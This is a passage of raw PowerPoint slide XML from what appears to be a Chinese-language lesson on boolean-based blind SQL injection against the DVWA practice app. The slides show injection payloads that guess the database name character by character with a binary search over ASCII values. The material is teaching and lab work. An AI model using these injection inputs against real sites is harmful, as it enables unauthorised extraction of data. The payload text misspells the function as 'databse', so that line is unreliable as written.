            <a:ext cx="7996660"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C32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3693071" y="6057587"/>
            <a:ext cx="5328592" cy="576248"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>说明数据库名长度为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399916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32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028775" y="445031"/>
            <a:ext cx="11161240" cy="506998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>思考：如何获得数据库名字？一个个数据库名字尝试？何不采用二分法？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100"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C32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2396927" y="6280621"/>
            <a:ext cx="8352928" cy="499624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>重复上述步骤，就可以猜解出完整的数据库名（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）了。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="表格 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1953275135"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="849698" y="981419"/>
          <a:ext cx="11303370" cy="5334000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11303370">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="5189984">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="266700" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>输入</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>1' and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>substr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>databse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(),1,1))&gt;97 #</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>，显示存在，说明数据库名的第一个字符的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>值大于</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>97</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>（小写字母</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>值）；</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr indent="266700" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>输入</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>1' and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>substr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>databse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(),1,1))&lt;122 #</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>，显示存在，说明数据库名的第一个字符的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>值小于</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>122</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>（小写字母</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>z</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>值）；</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr indent="266700" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>输入</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>1' and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>substr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>databse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(),1,1))&lt;109 #</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>，显示存在，说明数据库名的第一个字符的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>值小于</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>109</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>（小写字母</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>m</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>值）；</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr indent="266700" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>输入</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>1' and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>substr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>databse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(),1,1))&lt;103 #</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>，显示存在，说明数据库名的第一个字符的</a:t>
                      </a:r>
                      <a:r>
